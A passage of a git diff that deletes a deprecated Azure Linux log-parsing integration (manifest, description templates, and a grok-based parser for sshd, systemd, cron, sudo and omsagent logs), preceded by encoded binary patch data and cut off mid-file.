z^9oG}*Or~Exnbh;$fok`*5X%!i|vs8FNl4;;Gl`T0*Q>TNxm>M!wjLu2c}(DNBSHV z?F;vd`EY{AV1d`MqF}%Ae-`G%g^ylA>+_p}N4veJCR$8WClfeYhuIh$@AEkMsfN36 z4#z#t+V|RYaesA}pBJjcZL1c$BCxShJz;RJL=6k>*dvd$P@ZiLKcy|7V(54qMzqXJ z?uetl>%T2(p|M|a1maDL+*JPqx2T8d?9ux*Ca7&R4q83KWhNk?hqO%Mgf<&th zl@LFMEnr)T{^|=;zYF@1g|oJ@Rm#g_8+=@{K%Jc?M}`qlf7k7|+w`)s%CwC%(w|fH z4YMBZ0o$Qu=l+$dUfxYF{1?(MThZEFHz^$D%A|omr2q1{lsf#s6y9>$yuK5UGs|ezr)t~ zNeEh`JPLWP3+?L+jKTTfGagl5y@hX*kRz#s`r=fzWO!XiYFMj0ih5&Qi;q!$mU6^1 z`Xy=VyVZ_Xc{sbf&BFJx5kpiSeopoRuZ^S$Yla%8XO|0C5_DGpfWiH}+NST5xytQ8 zNbqLUbWK3BPA=#gY8)8C7oP$P<6KUEX|i}yG>JVBB=pljV=P%7CoVE+0&rqRCxigt z>xcjHC}w6{M|1PsDk|!+xlhh1+Ln!91~Dd=*8Hns7J)w`F&k9rC<)QQf=LAw`+GR}Jt)cGVg>l{ zmITX72E|{*juJLGUdz{-f^Bp1HJ4nj3thTJxy;95K;h5Dj8P zY=fS7869+?zlHSaI#;ZrkP)K2MeF)FWvz5wGRXzq0Z#Sz?heQ9lUp;6&c(#B1tlr| zLpWayniSKa(&obnU5DD8H`Oi(groT_I4-gZF8$4$Hz)fZ&5xpo^DX_(1}fmTv!nxj zt`%EVa29m;>FGr@b!OF#WI>JfqQc`9iT+uXEx;9S7wXFFpd1%Ar&G&H9_=>Q1{X4x zc&n}GXpf~=dED1;1;MkvmS!iDDKSYQvJy%Bgj*l!RAny5dw2RiWKYR31N~g{T@)y% ztK&(DcqGG>c|%*<$k12Os~LywU-)kwkoXJd$-q30OwUlBkssqpQ^U|LA;it}sa4RK 
zICZ8#xzSA+xncvClAimq({U_wjB}D(;=j<{S$6d|vB&9z{|JfnQWrnm>(V{qb-n-c&=J~wC|Qn1*%Qy^ikUQvWYL{b1zs1Jy5&sZ`j z@fh}f*JnzPj9{eZe6Hx zHR;wBlB^9GES%sH!coI9tOR?PWanmT}qzj0SBrUZZ-YZtM^wE?XUel%Nkv`+^^YR&TLuA|qAxwO{DJh>e;Vic+2WLe_7 zS9@K}THv9nlybsAW&C1k2GA8Hp2@lcqjp)R(~ukx6wLYt{c6;j^7i840pzF665}19 zsg4#7X-~CpkF{+#3x-izQ1zJ_E6rM(%_iuos@MEk!_z9n%`4#R^!n=2&3EwX#MjB2 zhy6N3l9Y_s$j;CH9#}(V?Ouql7y|VSka!-DVFLf9(-r|^*nqE<+fuX~WUy#Y0WKJsR(p51Pf%4HUEI}~Sn)$jb%;U`T^Ire(V z%lGHkSH-J{Uu;PYpWqdF)(7nZOWIn@oc6bLOc<<_lQPp# zTzgu(!%%o(h(VJ8;h73e9Ajqk!W~~5sF($z1v#l0th!RgTT*xRb8t@{4dR*;&YawQ z8#@DIMe@fd757iEj`_j#75hnlN*IQwZI7d7peHTO6h&&?xKFcsVkwJWc3af(qbYce zIdOnzvxE#r9ktiW(cJe}osd+!Q&PaUHLtgFrhzA4_n=AN`qPgmyU$w<<3Pp5@8E<~ zMF>~s*9@|M3X)hlNq%}>{8z~tXruLXDIi3q#E55=xy!S&F-sT8;8Aak7vo`^_~I9Q z!WqRg8`ib!6q>L+`ELE?)JHq8o92f~Agi0#?`T%g&6S4Y)nc%T*h2p7P(w6`esuri z&9q{3RpV0wH*Et?%H`I*#2?-6XKUx4mr8yaV#+`n4n)fml#YMO^#q`o;Oa{VnLlYm z#=`IGYVSn>xLGH=Pl;iUWewM!FmbMbEQNN0R0Vj~1>aoQ{YEig>u3W!wml5mJXR>WuG z=YZ(it!2YIsp_)h9YSIN_E)i_HA7cTS8S{ySXM~Rztl))hGUSj0tgvEdQ#LI2%Mgs z+&%3DP>+2A@X|6wTT;lEzdmCKf~}vzK3x9i1=Tu&naPBuM2gosL2Dw=hy*zl<{4sW zuP*la&i}>-Eb7T-&oHv9lSs3JS_21+KNZf*I$=z}_Q%-ufspl=g>pO!a zE|VzZ&CN_~Y5$+R1uzqN*<(cW>J1@;E~~Ms6%QZe$b_a*G@C!eso@sota#Ol2Y5aO!Yr5RSb z_)9L5nY;*mm}Nwm3lgw9u)#;j{19J@Bkr0?lc8{MJdHCOb{MXB%lwP>_1tTy;b3{{ zZ|lt-7Vm@zlqB!uv!WXCxmOBaw`DT&BKUpmo!{sq2aZgAQ zrz)7Ffr47ea82XsWEtrOGG@rJDNvZCe`Qt{fH8^&=W6vWl`-Oo`l+LN?M9b-G7t{z z8ouR97vN~2vG#o@t)3y*H0zw>Tb!neCn9rG_2rmy4+kg8-!E5YU24D~@RU2XMYap< zX2HCIR7_)G_9oE%m?sR|^GkKF=#Z-Cx}WFu-qe5BZs{lX9f z6o2r?kEIW5Yo^pd43<{yj>qX`J+^rMLx#c<xeYM`3UEU$><_GI<@KPCk#~TGH>>+e!a+Drd9#Q~j&X6U#`| zyg*8fy`TB?*?sDT83A&2Ottiqt)`I59X9wTi3j-b>C zo9RSUYI~ebvCwMbGv`5?uPV_Rm+_k}#+%?`jc<~!>vuK4N!+zv`6_tEml{5rL7}F} zJ8`;eYs%dpCE7DwPRx5gL;h+GBw^p1X_)g!6bb{RX2DgqdBp*FyA#Y=hbC3S`QJX( z4yDTz&3yrGocp7eL)$4dl#`so>wJd+lo>v4tTC{YZuh_ug8lVM?Ct6cxK_spOOi@{ z{Dx>gKJp(GC=@RY+BnF&lR66?b00=&={!v@TDa}v9q}aQv>aR#Q|ci=M9@UrQ_c%h z*8FxlR6X}?H*(zBa+R0g-RZtR>p0VJT_-iD=Y}rU#(II59F3;IQUN`3UIM3^QTy1s 
zBENaFdW2`^-*mD(G(ysyqFy2R$m;V9c=XC}&Dyn!R4K?v1 z4!=1LJ#2G&mJYh^#!Tk|+m8ms z-?~#JUZf7@JVv(&jIAtl>X*bF8$4*f`_+&;UcHMv-1OQ+Lnt~)<-c;Z)e!V^Z|V%W z>KKSrYrzo2j6%VH@C*H699l5YQ2kI`rAXME*2J9whev{lfJIlR7*g{YXTV85(L9+g zW<@ZPRef|-!E?0OZA~A6(56pMRl1-fH@&3c#^ET?ZN$E{HFC0L}f}`JoQLN&SA?{E(;JRoA0h_ zBR_em!THj-H098A-yrtX5JlUL8JZGbNqI?YG|fveDNW2e;)I>XUCt_(_o?mrS7I7i zXK2Was4~7k7OT4UnT>TR4yLx2IBb&8uJ^Oe86G3ymxs^A7k&y0i5yQQ-Q`M{us=7 zsdQ%g(6gsq7f*nuZ_uTREz_DOmqp{NLy+C6bvM7IcN@u0>Z)2!`;JC~iA`S=mi7X# z@c5LkWySq{{>!l~`D;ZR8&?V*9o-ibQfYqSTYtUk&zTp$7X@&3gCH?e7ybnVJ}>RO zD4vfEb@=ZMo7jUmZc8YGj&?#X5#x2~7 zRNTa`fpTN32JHT z9Yn2jJjrh^z>u+soSLRB_V29LYX|Y#8yXlC5wPK6l~i*J;O^e=76>sLmDW}(Y{5wR zc2FnT)5J90XRI6VP*8h`ok-09_NYmO8tRdlFCr(YPd=VEy3Po^a6lGPXkWY<8^f_a zz@#`63PZNE0jrOJ&oc7PLEFbOOv2U`3&d!Ws!HNfU@hPV!~^!v7-_%!Cil`CtRKI* z`?1)GS3jGguN1KPm0CMJH-ouew*p}^FSqlKfPIJl%?!zB#SIDIp_BgyL~1?ndml9@ zDKyP}>?B}*7YdGJ8ijh*qkU<7ge%NXF>`;n7O*{nyfK?Z+*r4lo|+YL?Wlg{hZAUkpF+n^lGbFTf)( z!uYRwBAu48Rnc%3XynNc4tbc^#T*uJ1%KV-sC<2gKGZUGxT8@+&u_j=Z%0>J{nV+ zM92dG>?!69Z%6_cr6MzqjLC=xoSjT?3udd5gWce3DzgmNydl+r4`Zh0!NI`;j$G~b zMcwniUrX~l@LLwcG+7vbSuFi~6x_$mHX$)joQUD|L0n$=92eewYvIaTeAAhm?l_Zu z(`U)fwo7I1euP62)>&HQPL!W7AZnyV^_^Xn@zyCge zFL|U75yXe?b|1Xz=Ga(Qn^Z)Xxiu;;cf+TcayF&Qbw0}F+PL|xFQ%pMQH<`8QS*!% z%Yh7oz8$Kw_ z2O9PA`d3yWtu2eTH?!;tUk+rs4!C>0Sk_O)A;7Eewxy>ZNRYD5TR6ZM+P4*ooC{BC znoEFpJ7-H7!xIuk1$u11I(BGbe7xijY`0q3LRd0EJ_$BPV ziZ!ho&$x1=L;!}mlJ77y8)XMA$LWhYeca!L_p!w~sE*Sd%bhiOGoQSJ;+N+bdd8aN z#`hA<^|`khP;w^DwwfjdGM{{M$A;cs*l?H=etiQ%=8*q>*;V=tkpQnK8nCM5+IVDn z9mRiQYNX4vS7uLD>T#8U!bpLrt;lxO{B>%a7>4yO zK~H;aDG6eczqHAzVtbJ@x!WSY)tF9FvZo4yoP1RjgG}QCCk)?DMdSp+p3tD@L$y~5)1Dw92-!zx)Jz%_0J8sI*_WYn z8^RZW^7ro_8sNaQ9?#N0^qOyL)+i^8u4JC~;P1@3woe`;gW{`+s z?&h6WHXV~|BCTSUZ6-ww34VKM&!b{m&r>_9GZYRo2ffF+}#NU1hZJ_YPFNHvQtcq}*L_Md$kVm2ja^+P}ueTO)C zkSkwYNLO$q*`+>pQh{@Dx;lw+M83f)7K9&i|Fz@W816#v9V*wwwN*V|SYRU|NCl+i zaWdCH3y@m?;jDQ1{a05KVK7g?<7>c4A@ zO#Q%3_u`iVHR<~S+f1bGfMigSU6eh8qMM2$=vOp%`|I;WD~IR9tMiDESc(VqwC2J1 
zk?#<9CvDD0B=WX8RipB%G6v9*VprE_Q~W+8(>5jR67f40$<)j!*vxfd%UU-|TK=g6 zr<>obt5$GekQq`ltTR+wpqy-Q1syl3xGX(C1{oY8lS|{R;7X%O${WdPxM}!j_D`Ix zjxgtkppZWdfsRc)kqf^`Dq4~s$>JBngB_ZhspUQ?9!@{`PuD%oAGsS)!UKtp#h_vX zZ7cRS&%OkxUyk=B_tfBs58AOU3m0i6Dg()ra%R&WiX+m&A-&I^;UmOK5Z zT@+4c5U#nJtcX6y;)t;8KhpUh%=IhbE8D20#+WldwpsLqwkAsFyI@S7aN>^&j!t*( zD>pnOOm;J1`H;cez6|ix1resMsZS+a-{145!#u`-6_n4>oC1FfsQmLPFD5yAS%sK7 zuW&y3oDn&Z+eqEL)M_!6;G1*n_F{nIF@w2)j+pNOr}q;p{Rdjk6;y9b(UI+Fm1JV|Q z?@QfS)&55-2#~gtvFLFx55&W+hb4b?0w(XgjE?)FXn&V6UAHys*YG*vH|YbLu@%A+7@wyF*HX|cNPqKl_;!s3!QVN|dba{dQj*HGsa z&4gIQo9AUH0(O<9Q}QE$348Uy4{PeOe}-FTV z&FipQb&yD3cxni+ITg@g5xS$IBAvrjo-W_a`{6~1BcIF2Zdip!|Lj`ao3pfOwT1p+ zbDBGnqOHiPYajd0m@se1mBG~ZE=3nWOZb^Aj2^!9e<$m zndY##>VtiWJegc5w@2&d*tspA&Gi;sDJ(g%I_@VxO1W)mX)05X8||Y5nr7l}CGQ^n z$9pOcOUHkq86JRs7P(-#{G}sPNlm&95@LR@B<_eVQ5pUiW{^^c%yJE74G3o7wza;E zhLJ<6D^4PD(mH5QR^*{Sd2gh?ArMLv5lvBSa53^;0rQ?l!Qs{s?9kCn+f-3a8{1rZ z(`RNIh#+BBlvLkuTm%pHD$@z1300&OM@AaLqTPhAff7FrTruzHD}Js{w655<_NJ1+ z1r=3MORvk{7RY=~sMXtC7`02`aP>b#_`{hJPEz(DJ6q4wZ3LWMDkO6>B(nrpde%2v z-VmH$yK{}+_LFF$KNZRbQ6l{r9J+}}z=>jA;xm#u5_`KFsTC6oIEM@70io)iM8r#< zRLf?@(M68X$PTs%lTW4T`bW3uUyNa$iBuMOiCNEO#?t%FO72RZs#C4!=4c3Hjy^QVg;ziuL3Jl!^uqsA}*VeLjXha=n<7jJ=mJ`>38l z0&UvKCr&j-(4TgEn+7C8r}F|@KZSD|9i{+v2705sUa{3v_wjWRe}!)BdKRF)EHl|k z

yMGDz%QvyGfo&@;EVN9ND0>oa{Se*iPBLYXSepIHavg($_+Jo6*XQYH0&-kcQ zfNh<{tz8SKzt0`f{=i~RNfsYFF6r9NJR~7)&oLmQDdjUiQ-d1$%ngkyTC}GEDuLV{ z%Q0l=`5Cvt(FRu`E~^GrH+&l)#h8@K!ddx!Jpwwv3K$yy644A&geUFHJB%x9t$)Cb zccc+PtKU0DYyYp&2Pl8;4tn~LpU*eIU30`~9GmpwC+%gG)R613u!v$G7Yo8hK?D^Z zBPPXrkyMW=DJwA%>3jQC4Dv;j-ui5ug;=qr!0uG8a&rOi3Nc{}^4SM_L^o~bNd56e7ul%=Migo>BX27d+wx+0d*5hxYOR~A%ZvCr6RSBfL7ZaKZd zXZ~=gtG~TJ%WDEi*rg^%0wM2Xv*6%0JJe<2I*5VVJk8%-7t@jNU(L1idheGVggAC$ zf2%Oh#>t;y;-q=|Raxx$WlCgPhqB2|`PblPu?cNjQT$KDIp4`!LL6hcmsM z#^Qi-^>-zcL_f1M_lG3yN!qKqIqIZn2i>gbTG{?2Zuld>66o&StH!gC^l?xk!vb-E zr(4qFCeJMZCN36t@!d{9m&*sRMaY7gYYR7=kvZtW&e*u#h z?*KhQ!Ow5Ktpb*N4tO^B6C^28Ni+`s zW@m7jP`^N50*Ok>!JeDM;*e^OII0@uva_4PO;{%LM$SH?1cPTP|$b7Qs#v zb1lMG{|+NK51l+^1d-SO{6t6!QmJY*gut_a@uaf!Y{a0k04m4HUEvp~>B04b#3w2jrcNHEUPV|U=jajLA+|^Cn z+tML4AemQ4M5;JNiTPwV{jiv?d2gKYdx5tk2jMn zfK95U#qLT0tR8$23iiLK&a7 zymaDA6QLwjx%I@R8`3z`a;k>$12%wP0=bv8hhD%N|5tx*V&5`L%fnJJWiTLnn{nhLOH2M1LrTaJg~!m^eiwtQ-%2rZ z*f~0J9&+D5z9CNw9;iIIz?wwI*iMi(*jUUy40*M@oXbdD{cF-cA}Spgprpw|swph0 zQgBg4N^{cS?1U*8`|}EXZPMx;ZGF%O=3_aLjI!a;a$;qSR97w^Sa9TN+B{w1178CK z*4xDdth7OD+(oG?O-ioHnoOFqEg>@>H4dacS=tPYoy_S9WzwU3eOMMe9|nTuXiZ`KlX+G zc1KLI_$n4(Vfw5}RrhkZ;eaXM0OR=mzLF@HI~a_abZuIvbLwjY zd@E0w3)HbzUOSSPP+X77Fmv9u*a)!bi(a6Ocmu!$Bjq&6B@bmR2rc=1!T8vMfODm)aFs` zS};IzmPH6QlNwZ-OzHI8#?=faUf0EGMiWVa9(G6nu`jPV2_8x0QtYEBF%?WhJ>gNM zP|=p^2M$TESHNVuRS=6%i}-pS^RYI_xeQ;a2aSE<6Az4xAW0ud@($o%F8CO@Q%nQC z*>l^$9tbsR{|l6Xs16c~rv5H{*}*b~9Qx&Di<~+ItgeO6My6g;>8PiLR3wv9{-t6n zX+s0Hrf&!m0QxP!1&LX>v)0NU#Zoy5-b2ur3Y(OuFf{CmWL6Z#TAS$>pTAd8`1(y zN!IY4!zLEpcqM&?A;WZ`qH>CVaDnvOV%>)4hWRQ7Vk3^0nDD-Na=0>MeTmF6Ebod^ zTk1#AS@PsK3sW!;u57De~py?L> zj4#9*rlz#V5UXo=-Xc+7Xck%BTW$nFU*X=F#`lRHA^&M2g+4dW&gcQQ_w23cub1|Y zR1|ZQ?OJ10J&yH`xG~a+bri?-ce=R|haHXcJJZ;QKN(x}Y5QS#B-6aFP$d#Mfn*Xn4P42A$l`i|q`Dxi;2X2*kI5dr>4fv28gnk~iDg*%U|J)Jyf2F)Dc{0Pjw=ShJb9y5NcWAHTWPmA-pOIPFg8O{049C}fDMpybQ_mz`A$UU=o;-` zJ!@)ygc+?gEfe<9M<&q?;+;f*RiH$$2R5ub#2@6>9x_9t@-}?W9k$;5GW!ifia3@$ 
zmPg9L>L)$_MuS~}M_OQQMhnvhCIXjc#=5}J^`unF8FI1XAm08Ab|aZB2Rr{Qhfc^} zeh+#>+_+IYRH*$@D!9alO6e>x70bH`dNS@QVXt#W@~SJsr-Yx(!*LSq-&{#y%JDIZ zm-6Y{qJ8XTQ_3sbBCF>jNCKLN#Yv=yXgaXEKOBpF!&dHf* z&T$_?HJeKp^~hx%L~@&3=)`P@lFgyV;Ut%BZAKTu7@?T4nM-bknNx{~@zlaei!HZh z7&_~JIPVYNAHVO<@ArAWpBJ{ADCfq=gRHhT@#xyAsRSm{`DwSPhX2@eqKethOS$*#gOU?^zVLwShORa2 z65DIbiXyXU)-T3_Ve>W3bS6SLuuh(8^9)=o+X+@2#aoJhl2Tj2e5;2+2p{P~T3kri zDWT=xg6Qs#bWvS~jcOECO!$V->`n%_j2(jn*)qk%*nHQUM0}%3MLnWP=VBfPmc*}2 zOOyIf@)?OBY1~+T3OwWlbu*g8B-733#84UVc@v^KX_TmB#!*?Vvupvh2T~8Oe#w6b zeVUsoZo4JHaZ}a=xy3fnslmiYZ~Lsg2R)UMiTA;WNt%rn3>mSzf7lJf95A=J`i7f? z{a}1Ac8sw~cWLi9oh*K#CxWEa7z6jJOP5M6oweD84PYw2 zh-|VFr6(z|kX~;VkINZo%~+c4T7Qo90HEP`qcpr+7BJ4kx9o+d>ZZ^S8L?6wYI8`` z?~YD-?%pHZ&PAP49?Fn#jLy-3SQJ+TK1jvE#mf#C?4E$jjmC^g$djzDndRvy1G(uO zD*H6>MI@xJS_W0AEjG>xepk(}{snOIvU94k0-}B-`x`#*YcED`ydK6a)e9~Ydzc+s z!wbAoT~*|(T{1^6^%Sgg=(vnyf<{G;&X^q9{F5D6KNjEdQ51}o2%miSrB0e3NqV=~ zq4p_SxR&|7ftOwJNPGyL2_8qmK0EU*E3pM5!mv^NrOqL6n$Ne;Xw5pq0LiR?$0h?Z zc57^(Ofp>#)4avzZiqHSi@Mvv<~=)GB7NK1mFJFw3)fg&CgEAb_MV3mo4Pk}JE-0e zH#Ezkuijeg4@=jA1CPhn40c5{f+E!8>%if$*AsNH;ZWDXFFeEpxSOAT8!@BiwRz1D zu(8gCd>SP_sKr&rAPu5eXYCt9uIH3n=Tar&w-TmAY!>kkCGp+kuRMw>i+Kd-!KhmvNpM*w;<;(svMEhoqNFY-Rg(T$(gx4DO zgjFt{f<*h-%Z6tIcu{V!q6(_mQN0(1u=Le2mfNJp$gRZVa6B%BaQ(bd$FF&l69fy; zQjtcBDGB3Y9;~j8q#JHL_9HC2DsVX`G%y-d*P3MgWlUa3yW7 z!`y9_l8wFNU%~@qZ$ufcqe}5DL*!?j#1UXQ-H4%B<>1V3*PLeehjlGFmfGFF9q}mU z$unV4^uEC%?!OIL+jo9&a5WNXntJE9T3t|#0@ai<8FU{|f2qfHGnw!4fLu1zPTP4! z8DbA+y&9e+qb{HqSfP6F^(2lmkTf}x5_QzyHVa-z8RBGuxx0#_pBXegC%2`d!qktd zKg>byKB{pVp9Edt`}wt}lh0R2=Hj|>)qLd5h73E>+uc=_v`xsXgz^vbwy%}XdBM~D zFlrjWePoV5^z(b)&aO)su+n*h#VHl`pF&|_RdjB~`6lBGr%F#WPoPh0x>zbN#u;Cz zqRuByD_t1?aUlhzp;`d#Z6e_S)q7Idw10hHZSz*uN~_%h=dq!J3K{;!A`VSng}4`b zcG`{KK+fSiDQ7?{xOehq)-gfp?=R`ECB9)z;2HZ-{g(332%~Vlf##6uo#qt-E(#Xs yOyTy;lY1Z$c}M&IFVQ^+21eB*6@DlBmcA=PDS%pCQ9MmaF>dEPoa)bp{q-NES7Gb` 
diff --git a/Azure/azure-linux/_meta/manifest.yml b/Azure/azure-linux/_meta/manifest.yml
deleted file mode 100644
index 862c62098..000000000
--- a/Azure/azure-linux/_meta/manifest.yml
+++ /dev/null
@@ -1,13 +0,0 @@
-uuid: 162064f0-c594-455e-ac24-2d7129137688
-name: Azure Linux [DEPRECATED]
-slug: azure-linux
-description: >-
- Azure Linux is a Linux Virtual Machines service developed and managed by Microsoft
- Corp.
-
- Sending Azure Linux logs to Sekoia.io allows to discover system compromise, account
- take over, malware installation.
-data_sources:
- Authentication logs: PAM authentication mechanism
- Process command-line parameters: Common Linux processes (cron, ssh, sudo)
- Process use of network: SSH and PAM daemon
diff --git a/Azure/azure-linux/_meta/smart-descriptions.json b/Azure/azure-linux/_meta/smart-descriptions.json
deleted file mode 100644
index cdefa7919..000000000
--- a/Azure/azure-linux/_meta/smart-descriptions.json
+++ /dev/null
@@ -1,24 +0,0 @@
-[
- {
- "value": "{log.level} log received on {log.hostname}: {azure_linux.message}",
- "conditions": [
- {
- "field": "azure_linux.message"
- },
- {
- "field": "log.level"
- },
- {
- "field": "log.hostname"
- }
- ]
- },
- {
- "value": "{azure_linux.message}",
- "conditions": [
- {
- "field": "azure_linux.message"
- }
- ]
- }
-]
diff --git a/Azure/azure-linux/ingest/parser.yml b/Azure/azure-linux/ingest/parser.yml
deleted file mode 100644
index bd72b5550..000000000
--- a/Azure/azure-linux/ingest/parser.yml
+++ /dev/null
@@ -1,257 +0,0 @@ -name: untitled-name -pipeline: - - name: json_event - external: - name: json.parse-json - properties: - input_field: "{{original.message}}" - output_field: message - - name: stage2 - external: null - filter: '{{"properties" in json_event.message}}' - - name: grok_sshd - filter: '{{"properties" in json_event.message and json_event.message.properties.ident == "sshd"}}' - external: - name: grok.match - properties: - input_field: "{{json_event.message.properties.Msg}}" - output_field: result - pattern: "%{SSHD_INFO}|%{SSHD_ERROR}" - custom_patterns: - SSHD_INFO: "%{SSHD_INFO_ACCEPTED}|%{SSHD_INFO_DISCONNECTION}" - SSHD_ERROR: >- - %{SSHD_ERROR_IDENTIFICATION}|%{SSHD_ERROR_INVALID_USER}|%{SSHD_ERROR_DISCONNECTING_USER}|%{SSHD_ERROR_FOR_USER} - SSHD_MESSAGE_USER: "%{SSHD_MESSAGE_USER_QUALITY} %{USERNAME:user_name}" - SSHD_INFO_ACCEPTED: >- - Accepted %{NOTSPACE} for %{USERNAME:user_name} from - %{SSHD_CLIENT_ADDRESS} port %{NUMBER:source_port}%{GREEDYDATA} - SSHD_CLIENT_ADDRESS: "%{IP:source_ip}|%{HOSTNAME:source_domain}" - SSHD_ERROR_FOR_USER: >- - error: %{GREEDYDATA} for %{SSHD_MESSAGE_USER} from - %{SSHD_CLIENT_ADDRESS} port %{NUMBER:source_port}%{GREEDYDATA} - SSHD_INFO_DISCONNECTED: >- - Disconnected from(%{SPACE}%{SSHD_MESSAGE_USER})? - %{SSHD_CLIENT_ADDRESS} port %{NUMBER:source_port}( \[preauth\])? 
- SSHD_ERROR_BAD_PROTOCOL: >- - %{SSHD_MESSAGE_BAD_PROTOCOL} identification '%{GREEDYDATA}' from - %{SSHD_CLIENT_ADDRESS} port %{NUMBER:source_port} - SSHD_ERROR_INVALID_USER: >- - %{SSHD_MESSAGE_INVALID_USER} %{USERNAME:user_name} from - %{SSHD_CLIENT_ADDRESS} port %{NUMBER:source_port} - SSHD_INFO_DISCONNECTION: >- - %{SSHD_INFO_CONNECTION_CLOSED}|%{SSHD_INFO_DISCONNECTED}|%{SSHD_INFO_RECEIVED_DISCONNECT} - SSHD_ERROR_IDENTIFICATION: "%{SSHD_ERROR_BAD_PROTOCOL}|%{SSHD_ERROR_IDENTIFICATION_NOT_RECEIVED}" - SSHD_MESSAGE_BAD_PROTOCOL: Bad protocol version - SSHD_MESSAGE_ILLEGAL_USER: (I|i)llegal user - SSHD_MESSAGE_INVALID_USER: (I|i)nvalid user - SSHD_MESSAGE_USER_QUALITY: >- - %{SSHD_MESSAGE_AUTHENTICATING_USER}|%{SSHD_MESSAGE_ILLEGAL_USER}|%{SSHD_MESSAGE_INVALID_USER} - SSHD_INFO_CONNECTION_CLOSED: >- - Connection closed by(%{SPACE}%{SSHD_MESSAGE_USER})? - %{SSHD_CLIENT_ADDRESS} port %{NUMBER:source_port}( \[preauth\])? - SSHD_ERROR_DISCONNECTING_USER: >- - Disconnecting %{SSHD_MESSAGE_USER} %{SSHD_CLIENT_ADDRESS} port - %{NUMBER:source_port}: %{GREEDYDATA} \[preauth\] - SSHD_INFO_RECEIVED_DISCONNECT: >- - Received disconnect from %{SSHD_CLIENT_ADDRESS} port - %{NUMBER:source_port}:%{INT}:%{GREEDYDATA}(\[preauth\])? 
- SSHD_MESSAGE_AUTHENTICATING_USER: (A|a)uthenticating user - SSHD_ERROR_IDENTIFICATION_NOT_RECEIVED: >- - %{SSHD_MESSAGE_IDENTIFICATION_NOT_RECEIVED} string from - %{SSHD_CLIENT_ADDRESS} port %{NUMBER:source_port} - SSHD_MESSAGE_IDENTIFICATION_NOT_RECEIVED: Did not receive identification - - name: sshd - filter: '{{"properties" in json_event.message and json_event.message.properties.ident == "sshd"}}' - external: null - - name: grok_systemd - filter: '{{"properties" in json_event.message and json_event.message.properties.ident == "systemd"}}' - external: - name: grok.match - properties: - input_field: "{{json_event.message.properties.Msg}}" - output_field: result - pattern: >- - %{GREEDYDATA:systemd_observation} %{INT} of user - %{USERNAME:user_name}. - custom_patterns: {} - - name: systemd - filter: '{{"properties" in json_event.message and json_event.message.properties.ident == "systemd"}}' - external: null - - name: grok_crond - filter: '{{"properties" in json_event.message and json_event.message.properties.ident == "CROND"}}' - external: - name: grok.match - properties: - input_field: "{{json_event.message.properties.Msg}}" - output_field: result - pattern: >- - \(%{USERNAME:user_name}\) CMD - \((%{CMD_WITH_PATH}|%{GREEDYDATA:process_args})\) - custom_patterns: - CMD_WITH_PATH: "%{UNIXPATH:process_executable} %{GREEDYDATA:process_args}" - - name: crond - filter: '{{"properties" in json_event.message and json_event.message.properties.ident == "CROND"}}' - external: null - - name: grok_sudo - filter: '{{"properties" in json_event.message and json_event.message.properties.ident == "sudo"}}' - external: - name: grok.match - properties: - input_field: "{{json_event.message.properties.Msg}}" - output_field: result - pattern: "%{SUDO_USER}|%{SUDO_WRONG_PASSWORD}|%{SUDO_CONV_FAILED}" - custom_patterns: - SUDO_USER: >- - pam_%{GREEDYDATA}\(%{GREEDYDATA:action_name}\): - %{GREEDYDATA:sudo_observation} for user - %{USERNAME:user_name}(%{GREEDYDATA})? 
- SUDO_CONV_FAILED: 'pam_%{GREEDYDATA}\(%{GREEDYDATA:action_name}\): conversation failed' - SUDO_WRONG_PASSWORD: >- - pam_%{GREEDYDATA}\(%{GREEDYDATA:action_name}\): auth could not - identify password for \[%{USERNAME:user_name}\] - - name: sudo - filter: '{{"properties" in json_event.message and json_event.message.properties.ident == "sudo"}}' - external: null - - name: grok_omsagent - filter: '{{"properties" in json_event.message and json_event.message.properties.Msg is defined }}' - external: - name: grok.match - properties: - input_field: "{{json_event.message.properties.Msg}}" - output_field: result - pattern: "omsagent : %{GREEDYDATA:omsagent_message}" - custom_patterns: {} - - name: omsagent - filter: '{{"properties" in json_event.message and grok_omsagent and grok_omsagent.result.omsagent_message != null }}' - external: - name: kv.parse-kv - properties: - input_field: "{{ grok_omsagent.result.omsagent_message }}" - output_field: result - value_sep: "=" - item_sep: \s;\s - - name: grok2_omsagent - filter: '{{"properties" in json_event.message and grok_omsagent and grok_omsagent.result.omsagent_message != null }}' - external: - name: grok.match - properties: - input_field: "{{omsagent.result.COMMAND }}" - output_field: result - pattern: "%{UNIXPATH:process_executable}( %{GREEDYDATA:process_args})?" 
- custom_patterns: {} - - name: omsagent2 - filter: '{{"properties" in json_event.message and grok_omsagent and grok_omsagent.result.omsagent_message != null }}' - external: null - - name: action-outcome - filter: >- - {{"properties" in json_event.message and - json_event.message.properties.ident == "systemd" or - json_event.message.properties.ident == "sudo"}} - external: null -stages: - stage2: - actions: - - set: - log.level: "{{json_event.message.level}}" - log.hostname: "{{json_event.message.properties.hostname}}" - "@timestamp": "{{json_event.message.time}}" - azure_linux.message: "{{json_event.message.properties.Msg}}" - name: set - - set: - process.pid: "{{json_event.message.properties.pid}}" - name: set - filter: '{{json_event.message.properties.ident != "CROND"}}' - - set: - process.parent.pid: "{{json_event.message.properties.pid}}" - name: set - filter: '{{json_event.message.properties.ident == "CROND"}}' - - set: - os.family: linux - os.platform: linux - name: set - - dictionary: - err: error - crit: critical - info: info - warn: warn - error: error - notice: info - critical: critical - mapping: - log.level: log.level - name: translate - sshd: - actions: - - set: - source.ip: "{{ grok_sshd.result.source_ip }}" - filter: "{{ grok_sshd.result.source_ip | is_ipaddress}}" - - - set: - user.name: "{{ grok_sshd.result.user_name }}" - source.port: "{{ grok_sshd.result.source_port }}" - source.domain: "{{ grok_sshd.result.source_domain }}" - name: set - systemd: - actions: - - set: - user.name: "{{ grok_systemd.result.user_name }}" - action.type: "{{ grok_systemd.result.systemd_observation }}" - name: set - - set: - action.name: systemd:session - action.type: open - filter: '{{ grok_systemd.result.systemd_observation == "Started Session" }}' - name: set - crond: - actions: - - set: - user.name: "{{ grok_crond.result.user_name }}" - process.command_line: '{{ [grok_crond.result.process_executable, grok_crond.result.process_args]|select|join(" ") }}' - 
process.executable: "{{ grok_crond.result.process_executable }}" - name: set - sudo: - actions: - - set: - action.name: "{{ grok_sudo.result.action_name }}" - name: set - - set: - user.name: "{{ grok_sudo.result.user_name }}" - filter: "{{ grok_sudo.result.user_name != None and grok_sudo.result.user_name != null }}" - name: set - - set: - action.type: "{{ grok_sudo.result.sudo_observation }}" - filter: "{{ grok_sudo.result.sudo_observation != null}}" - name: set - - dictionary: - session closed: close - session opened: open - mapping: - action.type: action.type - filter: "{{ grok_sudo.result.sudo_observation != null}}" - name: translate - - set: - action.type: open - filter: 